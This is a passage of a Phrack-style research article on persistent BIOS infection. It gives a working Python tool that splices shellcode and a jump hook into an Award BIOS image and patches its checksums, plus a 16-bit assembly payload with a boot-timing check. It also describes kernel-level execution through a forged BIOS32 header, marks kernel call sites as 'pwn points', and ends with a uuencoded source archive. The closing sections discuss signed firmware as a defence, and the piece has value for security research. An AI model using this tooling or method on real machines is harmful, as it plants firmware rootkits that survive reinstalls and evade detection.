+back to the motherboard.
+
+---[3.2.2 - Modification
+
+Once we have the BIOS image on our hard disk, we can start the process
+of inserting the malicious payload.
+
+When modifying a real bios, and in particular an award/phoenix BIOS, we
+faced some big problems:
+       	1) Lack of documentation of the bios structure
+    	2) Lack of packing/unpacking tools
+       	3) No easy way to debug real hardware.
+
+There are many free tools to manipulate BIOS, but as it always happen
+with proprietary formats, we couldn't find one that worked with our
+particular firmware.  We can cite the Linux awardeco and phnxdeco
+utilities as a starting point, but they tend to fail on modern BIOS
+versions.
+
+Our plan to achieve execution was:
+       	1) We must insert arbitrary modifications (this implies the
+       	   knowledge of checksum positions and algorithms)
+       	2) A basic hook should be inserted on a generic, easy to
+       	   find portion of the BIOS.
+       	3) Once the generic hook is working, then a Shellcode could be 
+       	   inserted.
+
+
+---[3.2.2.0 - Black Screen of Death
+
+You have to know that you're going to trash a lot of BIOS chips in
+this process.  But most BIOSes have a security mechanism to restore a
+damaged firmware. RTFM (Read the friendly manual of the motherboard)
+
+If this doesn't work, you can use the chip hot-swapping technique: You
+boot with a working chip, then you hot-swap it with the damaged one,
+and reflash. Of course, for this technique you will need to have
+another working backup BIOS.
+
+---[3.2.2.1 - Changing one bit at time
+  
+Our initial attempts were unsuccessful and produced mostly unbootable
+systems. Basically we ignored how many checksums the bios had, and you
+must patch everyone of them or face the terrifying "BIOS CHECKSUM
+ERROR" black screen of death.  The black screen of death got us
+thinking, it says "CHECKSUM" so, it must be some kind of addition
+compared to a number. And this kind of checks can be easily bypassed,
+injecting a number at some point that will *compensate* the addition.
+Isn't this the reason why CRC was invented after all?  It turns out
+that all the checksums were only 8-bits, and by touching only one byte
+at the end of the shellcode, all the checksums were compensated.  You
+can find the very simple algorithm to do this on the attachments,
+inside this python script:
+
+
+	-------------------------------------------------------------
+	modifBios.py
+
+	#!/usr/bin/python
+	import os,sys,math
+
+	# Usage
+	if len(sys.argv)<3:
+        	print "Modify and recalculate Award BIOS checksum"
+	        print "Usage: %s <original bios> <assembly shellcode 
+		file>" % (sys.argv[0])
+        	exit(0)
+
+	# assembly the file
+	scasm = sys.argv[2]
+	sccom = "%s.bin" % scasm
+	os.system("nasm %s -o %s " % (scasm,sccom) )
+	shellcode = open(sccom,'rb').read()
+	shellcode = shellcode[0xb55:] # skip the NOPs
+	os.unlink(sccom)
+	print ("Shellcode lenght: %d" % len(shellcode))
+
+	# Make a copy of the original BIOS
+	modifname = "%s.modif" % sys.argv[1]
+	origname = sys.argv[1]
+	os.system("cp %s %s" % (origname,modifname) )
+
+	#merge shellcode with original flash
+	insertposition = 0x3af75
+	modif = open(modifname,'rb').read()
+	os.unlink(modifname)
+	newbios=modif[:insertposition]
+	newbios+=shellcode
+	newbios+=modif[insertposition+len(shellcode):]
+	modif=newbios
+	#insert hook
+	hookposition = 0x3a41d
+	hook="\xe9\x55\x0b" # here is our hook,
+			    # at the end of the bootblock
+	newbios=modif[:hookposition]
+	newbios+=hook
+	newbios+=modif[hookposition+len(hook):]
+	modif=newbios
+
+	#read original flash
+	orig  = open(sys.argv[1],'rb').read()
+	
+	# calculate original and modified checksum
+	# Sorry, this script is not *that* generic
+	# you will have to harvest these values
+	# manually, but you can craft an automatic
+	# one using pattern search. 
+	# These offsets are for the Asus A7V8X-MX
+	# Revision 1007-001
+	
+	start_of_decomp_blk=0x3a400
+	start_of_compensation=0x3affc
+	end_of_decomp_blk=0x3b000
+	
+	ochksum=0 # original checksum
+	mchksum=0 # modified checksum
+	
+	for i in range(start_of_decomp_blk,start_of_compensation):
+		ochksum+=ord(orig[i])
+		mchksum+=ord(modif[i])
+	print "Checksums: Original= %08X Modified= %08X" % (ochksum,mchksum)
+	
+	# calculate difference
+
+	chkdiff = (mchksum & 0xff) - (ochksum & 0xff)
+
+	print "Diff : %08X" % chkdiff
+	
+	# balance the checksum
+	newbios=modif[:start_of_compensation]
+	newbios+=chr( (0x1FF-chkdiff) & 0xff )
+	newbios+=modif[start_of_compensation+1:]
+	
+	mchksum=0 # modified checksum
+	ochksum=0 # modified checksum
+	for i in range(start_of_decomp_blk,end_of_decomp_blk):
+		ochksum+=ord(orig[i])
+		mchksum+=ord(newbios[i])
+	print "Checksum: Original = %08X Final= %08X" % (ochksum,mchksum)
+	print "(Please check the last digit, must be the same in both checkums)"
+	
+	
+	newbiosname=sys.argv[2]+".compensated"
+	w=open(newbiosname,'wb')
+	w.write(newbios)
+	w.close()
+	print "New bios saved as %s" % newbiosname
+	
+	-------------------------------------------------------------
+	
+With this technique we successfully changed one bit, then one byte, then
+multiple bytes on a uncompressed region of the BIOS. The first step was
+accomplished.
+
+---[3.2.2.1 - Inserting the Hook
+  
+The hook is in exactly the same place: the decompressor block.  We
+also jumped to the same place that in the VMWARE code injection: In
+the end of the decompressor block generally there is enough space to
+do a pretty decent first stage shellcode.  It's easy to find. Hint:
+look for "= Award Decompression Bios =" In Phoenix bios, is the block
+marked as "DECOMPCODE" (using phnxdeco or any other tool). It almost
+never changes. It works.
+
+There are a couple of steps that you must do to ensure that you are
+hooking correctly. Firstly, insert a basic hook that only jumps
+forward, and then returns. Then, modify it to cause an infinite loop.
+(we don't have a debugger so we must rely on these horrible
+techniques) If you can control when the computers boots correctly and
+when it just locks up, congratulations. Now you have your code
+stealthy executing from the BIOS.
+
+---[3.2.3 - Payload
+  
+So now, you have complete control of the BIOS. Then you unveil your
+elite 16-bit shellcoding skills and try to use the venerable INT 10h
+to print "I PWNED J00!" on the screen and then proceed to use INT 13h
+to write evil things to the hard disk.
+
+Not that fast. You will be greeted with the black screen of fail. 
+
+What happens is that you still don't have complete control of the
+BIOS.  First and foremost, as we did on the VMWARE hook, you are
+gaining execution multiple times during the boot process. The first
+time, the disk is not spinning, the screen is still turned off and
+most surprisingly, the Interruption Vector Table is not initialized.
+This sounds very cool but it is a big problem. You can't write to the
+disk if it's not spinning, and you can use an interrupt if the IVT is
+not initialized.
+
+You must wait. But how do you know when to execute? You again need some
+sort of ready-to-go signal.
+
+---[3.2.3.1 - The Ready Signal
+  
+In the VMWARE, we used the contents of the IVT as a ready signal. The
+shellcode tested if the IVT was ready simply by checking if it had the
+correct values. This was very easy because in real-mode, the IVT is
+always in the same place (0000:0000, easy to remember by the way).
+This technique basically sucks, because you really can't get less
+generic than this. The pointers on the IVT change all the time, even
+between versions of the same BIOS manufacturer.  We need a better,
+more "works-on-other-computers-apart-from-mine" technique.
+
+In short, this is the solution and it works great: 
+Check if C000:0000 contains the signature AA55h.
+
+If that conditions is true, then you can execute any interruption. The
+reason is that in this precise position the VGA BIOS is loaded on all
+PCs.  And AA55h is a signature that tell us that the VGA BIOS is
+present. It's fine to assume that if the VGA BIOS has been loaded,
+then the IVT has been initialized.  Warning: Surely the hard disk is
+not spinning yet! (It's slow) but now you can check for it with the
+now non-crashing interruption 13h, using function 41h to check for LBA
+extensions and then trying to do a disk reset, using function 00h. You
+can see an example of this on the shellcode of the section 3.1.5.1
+
+The rest is history. You can use int 13h with LBA to check for the
+disk, if it's ready, then you insert a disk-stage rootkit on it, or
+insert an SMBIOS rootkit (see [PHRACK65]), or bluepill, or the
+I-Love-You virus, or whatever rocks you. Your code is now immortal.
+		
+For the record, here is a second shellcode:
+
+	-------------------------------------------------------------
+	;skull.asm please use nasm to assemble
+	BITS 16
+	back:
+	        TIMES 0x0b55 db 0x90
+
+	begin2:
+	        pusha
+	        pushf
+		push es
+		push ds
+
+		push 0xc000
+	        pop ds
+		cmp word [0],0xaa55
+		je print
+	
+	volver:
+		pop ds
+		pop es
+	        popf
+	        popa
+	        pushad
+	        push cx
+	        jmp back
+	
+	print:
+	        jmp start
+	
+	        ;message
+	        ;   123456789
+	msg:    db ' .---.',13,10,\
+	           '/     \',13,10,\
+	           '|(\ /)|',13,10,\
+	           '(_ o _)',13,10,\
+	           ' |===|',13,10,\
+	           ' `-.-`',13,10
+	        times 55-$+msg db ' '
+	
+	start:
+	        ;geteip
+	        call getip
+	getip:
+	        pop dx
+	
+	        ;init video
+	        mov ax,0003
+	        int 0x10
+	
+	        ;video write
+	        mov bp,dx
+	        sub bp,58 ; message
+	
+	        ;write string
+	        mov ax,0x1300
+	        mov bx,0x0007
+	        mov cx,53
+	        mov dx,0x0400
+	        push cs
+	        pop es
+	        int 0x10
+	
+	        call sleep
+	        jmp volver
+	
+	sleep:
+	        mov cx, 0xfff
+	l1:
+	        push cx
+	        mov cx,0xffff
+	l2:
+	        loop l2
+	        pop cx
+	        loop l1
+	        ret
+	-------------------------------------------------------------
+
+
+------[ 4.- BIOS32 (Kernel direct infection)
+
+Now you have your bios rootkit executing in BIOS, but being in BIOS
+sucks from an attacker's point of view. You ideally want to be in the
+kernel of the Operative System. That is why you should do something
+like drop a shellcode to hard-disk or doing an SMBIOS-rootkit.  But
+what if the hard-disk is encrypted? Or if the machine really doesn't
+have a hard disk and boots from the network?
+
+Fear not, because this section is for you. There is the misconception
+that the BIOS is never used after boot, but this is untrue.  Operative
+Systems make BIOS calls for many reasons, like for example, setting
+video modes (Int 10h) and doing other funny things like BIOS-32 calls.
+
+What is BIOS32? using Google-based research we concluded that is an
+arcane BIOS service to provide information about other BIOS services
+to modern 32-bit OSes, in an attempt by BIOS vendors to stay relevant
+on the post MS-DOS era. You can refer to [BIOS32SDP] for more
+information.  What's important is that many OSes make calls to it, and
+the only requirement to being a BIOS32 service is that you must place
+a BIOS32 header somewhere in the E000:0000 to F000:FFFF memory region,
+16-byte aligned. The headers structure is:
+
+Offset	Bytes	Description
+0	4	Signature "_32_"
+4	4	Entry point for the BIOS32 Service (here you put a pointer
+		to your stuff)
+8	1	Revision level, put 0
+9	1	Length of the BIOS32 Headers in paragraphs (put 1)
+10	1	8-bit Checksum. Security FTW!
+11	5	Reserved, put 0s.
+
+This is a pattern on all BIOS services. The way to locate and execute
+services is a pattern search followed by a checksum, and then it just
+jumps to a function that is some kind of dispatcher.  This behavior is
+present in various BIOS functions like Plug and Play ($PnP), Post
+Memory Manager ($PMM), BIOS32 (_32_), etc.  Security was not
+considered at the time when this system was designed, so we can take
+advantage of this and insert our own headers (We can even use an
+option-rom from this, without modifying system BIOS), and the OS
+ultimately always trust the BIOS.
+
+You can see how Linux 2.6.27 detects and calls this service on the
+kernel function:
+
+arch/x86/pci/pcibios.c,check_pcibios()
+...
+	if ((pcibios_entry = bios32_service(PCI_SERVICE))) {
+		pci_indirect.address = pcibios_entry + PAGE_OFFSET;
+
+		local_irq_save(flags);
+		__asm__(
+			"lcall *(%%edi); cld\n\t"  <--- Pwn point
+			"jc 1f\n\t"
+			"xor %%ah, %%ah\n"
+			"1:"
+...
+
+OpenBSD 4.5 does the same here:
+
+sys/arch/i386/i386/bios.c,bios32_service()
+int
+bios32_service(u_int32_t service, bios32_entry_t e, bios32_entry_info_t ei)
+{
+...
+	base = 0;
+	__asm __volatile("lcall *(%4)"         <-- Pwn point
+	    : "+a" (service), "+b" (base), "=c" (count), "=d" (off)
+	    : "D" (&bios32_entry)
+	    : "%esi", "cc", "memory");
+...
+
+At the moment we don't have any data on Windows XP/Vista/7 
+BIOS32-direct-calling, but please refer to the presentation [JHeasman]
+where it documents direct Int 10h calling from several points on the
+Windows kernel.
+
+Faking a BIOS32 header or modifying an existing one is a viable way to
+do direct-to-kernel binary execution, and more comfortable than the
+int 10 calling (we don't need to jump to and from protected mode), 
+without having to rely on weird stuff like we explained on section 2
+and 3. 
+Unfortunately because of lack of time, we couldn't provide a BIOS32
+infection vector PoC in this issue, but it should be relatively easy
+to implement, you now have all the tools to do it safely inside a
+virtual machine, like VMware.
+
+------[ 5.- Future and other uses
+
+Bios modification is a powerful attack technique. As we said before,
+if you take control of the system at such an early stage, there is
+very little that an anti-virus or detection tool can do. Furthermore,
+we can stay resident using a common boot-sector rootkit, or file
+system modification.  But some of the more fun things that you can do
+with this attack is to drop a more sophisticated rootkit, like a
+virtualized one, or better, a SMM Rootkit.
+
+---[5.1 - SMM!
+  
+The difficulty of SMM Rootkits relies on the fact that you can't 
+touch the SMRAM once the system is booted, because the BIOS sets
+the D_LCK bit [PHRACK65].  Recently many techniques has been
+developed to overcome this lock, like [DUFLOTSM], but if you are
+executing in BIOS, this lock doesn't affect you, because you are
+executing before this protection, and you could modify the SMRAM
+directly on the firmware. However, this	technique would be very 
+difficult and not generic at all, but it's doable.
+
+---[5.2 - Signed firmware
+	
+The huge security hole that is allowing unsigned firmware into
+a motherboard is being slowly patched and many signed BIOS
+systems are being deployed, see [JHeasman2] for examples.
+This gives you an additional layer of security and prevent
+exactly the kind of attack proposed in this article.
+However, no system is completely secure, bug and backdoors
+will always exist. To this date no persistent attack on
+signed bios has been made public, but researchers are
+close to beating this kind of protections, see for example 
+[ILTXT].
+	
+---[5.3 - Last words
+	
+Few software is so fundamental and at the same time, so closed,
+as the BIOS. UEFI [UEFIORG], the new firmware interface, promises 
+open-standards and improved security.
+But meanwhile, we need more people looking, reversing and 
+understanding this crucial piece of software. 
+It has bugs, it can contain malicious code, and most importantly,
+BIOS can have complete control of your computer. Years ago people
+regained part of that control with the open-source revolution, but
+users won't have complete control until they know what's lurking
+behind closed-source firmware.
+If you want to improve or start researching your own BIOS and
+need more resources, an excellent place to start would be
+the WIM'S BIOS High-Tech Forum [WBHTF], where very low-level
+technical discussions take place.
+	
+
+--[6.- Greetz
+  
+We would like to thank all the people at Core Security for giving us
+the space and resources to work in this project, in particular to the
+whole CORE's Exploit writers team for supporting us during the time we
+spent researching this interesting stuff.
+	
+Kudos to the phrack editor team that put a huge effort into this 
+e-zine.
+
+To t0p0, for inspiring us in this project with his l33t cisco stuff.
+To Gera for his technical review.  To Lea & ^Dan^ for correctin our
+englis.  And Laura for supporting me (Alfred) on my long nights of
+bios-related suffering. 
+	
+	
+---[7.- References
+
+[JHeasman] Firmware Rootkits, The Threat to the Enterprise,
+	   John Heasman, http://www.ngssoftware.com/research/
+	   papers/BH-DC-07-Heasman.pdf
+[JHeasman2] Implementing and detecting ACPI BIOS rootkit,
+	    http://www.blackhat.com/presentations/bh-federal-06/
+	    BH-Fed-06-Heasman.pdf 
+[BIOS32SDP] Standard BIOS 32-bit Service Directory Proposal 0.4,
+	    Thomas C. Block, http://www.phoenix.com/NR/rdonlyres/
+            ECF22CEC-A1B2-4F38-A7F9-629B49E1DCAB/0/specsbios32sd.pdf
+[COREBOOT] Coreboot project, Flashrom utility, http://www.coreboot.org/
+	   Flashrom
+[PHRACK65] Phrack Magazine, Issue 65, http://www.phrack.com/
+	   issues.html?issue=65
+[DUFLOTSM] "Using CPU System Management Mode to Circumvent 
+	   Operating System Security Functions" Loic Duflot, 
+	   Daniel Etiemble, Olivier Grumelard Proceedings of 
+	   CanSecWest, 2006 
+[UEFIORG]  Unified EFI Forum, http://www.uefi.org/
+[ILTXT]	   Attacking Intel Trusted Execution Technology,
+	   BlackHat DC, Feb 2009. 
+	   http://invisiblethingslab.com/resources/
+	   bh09dc/Attacking%20Intel%20TXT%20-%20paper.pdf
+[WBHTF]    WIM'S BIOS In-depth High-tech BIOS section
+	   http://www.wimsbios.com/phpBB2/
+	   in-depth-high-tech-bios-section-vf37.html
+[LZH]      http://en.wikipedia.org/wiki/LHA_(file_format)
+[Pinczakko] Pinczakko Official Website, 
+            http://www.geocities.com/mamanzip/
+
+  ---[8.- Sources
+
+begin 644 phrack-66-07.tgz
+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
